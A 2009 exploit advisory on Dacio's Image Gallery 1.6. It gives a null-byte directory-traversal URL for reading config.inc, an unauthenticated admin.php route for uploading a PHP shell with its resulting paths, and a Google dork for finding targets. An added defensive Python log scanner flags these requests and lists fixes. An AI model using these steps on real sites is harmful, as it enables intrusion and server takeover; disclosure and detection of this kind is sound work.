Dacio's Image Gallery 1.6 Traversal / Shell Upload

2009-05-11T00:00:00
ID PACKETSTORM:77395
Type packetstorm
Reporter ahmadbady
Modified 2009-05-11T00:00:00

Description

                                        
`=-=-Local Directory Traversal/bypass/shell upload/-=-=  
  
-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-=  
script::Dacio_imgGal-v1.6  
-------------------------------------------------  
Author: ahmadbady  
my site :Coming Soon  
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=  
download from:http://www.kopicaidej.net/index.php?com=hex&Dld=59  
  
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=  
Directory Traversal:  
  
/Dacio_imgGal-v1.6/index.php?gallery=../config.inc%00  
------  
bypass and upload:  
  
go to admin.php (panel bypassed) and add an image (shell upload)  
  
shell: /images/beauty_1/shell.php  
  
if beauty_1 has been deleted, create a new gallery, for example aa:  
  
shell: /images/aa/shell.php  
-----   
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=  
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=--=-=-=-=  
dork: intitle:"Dacio's Image Gallery"  
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=  
  
  
  
`
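
Added example (not part of the original advisory): a web-server log check for the three request patterns described above, namely a `gallery` value containing traversal or a null byte, a POST to `admin.php`, and a script file requested from under `/images/`. The log lines are constructed, and the common log format, the extension list and the function names are assumptions.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed access-log lines (common log format) for illustration; not real traffic.
SAMPLE_LOG = """\
198.51.100.7 - - [11/May/2009:10:00:01 +0000] "GET /Dacio_imgGal-v1.6/index.php?gallery=beauty_1 HTTP/1.1" 200 5120
198.51.100.9 - - [11/May/2009:10:02:13 +0000] "GET /Dacio_imgGal-v1.6/index.php?gallery=../config.inc%00 HTTP/1.1" 200 412
198.51.100.9 - - [11/May/2009:10:03:40 +0000] "POST /Dacio_imgGal-v1.6/admin.php HTTP/1.1" 200 2048
198.51.100.9 - - [11/May/2009:10:04:02 +0000] "GET /Dacio_imgGal-v1.6/images/aa/shell.php HTTP/1.1" 200 87
198.51.100.7 - - [11/May/2009:10:05:00 +0000] "GET /Dacio_imgGal-v1.6/images/beauty_1/photo1.jpg HTTP/1.1" 200 90211
"""

REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "([A-Z]+) (\S+) [^"]*" \d{3}')
# Server-side script extensions have no business under an image directory (assumed list).
SCRIPT_IN_IMAGES_RE = re.compile(r"/images/.+\.(?:php\d?|phtml|phar)$", re.I)


def classify(line):
    """Return the list of findings for one log line (empty if nothing matched)."""
    m = REQUEST_RE.match(line)
    if not m:
        return []
    _ip, method, target = m.groups()
    parts = urlsplit(target)
    path = unquote(parts.path)
    findings = []
    # parse_qs percent-decodes once, so %00 arrives here as a real NUL character.
    for value in parse_qs(parts.query, keep_blank_values=True).get("gallery", []):
        value = unquote(value)  # second pass catches double-encoded input
        if "\x00" in value or ".." in value or "/" in value or "\\" in value:
            findings.append("gallery-traversal")
    # The advisory reports admin.php reachable without login: review every POST.
    if method == "POST" and path.endswith("/admin.php"):
        findings.append("admin-post")
    if SCRIPT_IN_IMAGES_RE.search(path):
        findings.append("script-in-images")
    return findings


def scan(log_text):
    """Return (line_number, client_ip, findings) for each line with a finding."""
    hits = []
    for number, line in enumerate(log_text.splitlines(), start=1):
        findings = classify(line)
        if findings:
            hits.append((number, line.split(" ", 1)[0], findings))
    return hits


if __name__ == "__main__":
    for number, ip, findings in scan(SAMPLE_LOG):
        print(f"line {number}: {ip} -> {', '.join(findings)}")
```

The same three conditions map to the fixes: accept only plain gallery names, require authentication on `admin.php`, and stop the web server from executing scripts under the upload directory.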